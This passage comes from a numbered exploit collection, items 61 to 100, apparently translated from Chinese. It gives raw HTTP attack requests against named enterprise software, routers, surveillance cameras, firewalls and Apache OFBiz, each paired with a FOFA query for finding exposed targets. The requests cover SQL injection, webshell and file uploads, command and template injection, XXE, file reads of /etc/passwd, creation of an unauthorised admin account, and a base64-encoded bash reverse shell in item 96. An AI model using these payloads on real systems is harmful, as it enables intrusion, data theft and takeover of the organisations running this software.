Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x


63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>


65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--


The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


70. 万户 ezEIP success.aspx command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD


71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1


72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}


GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x


77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--


GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. 速达 天耀 software DesignReportSave.jsp endpoint arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>


GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. 宇视 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}


85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundromat RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--


/jfhatuwe.php

88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close


/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD


93. 奇安信 (Qi-Anxin) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. Qianxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Then fetch the uploaded file (the filename must match the one sent in the upfile part):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

Note: the base64 blob above decodes to a percent-encoded string (bash%20-i%20>&%20/dev/tcp/192.168.40.128/7777%200>&1), so regenerate it from the plain command with your own listener address before use.

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

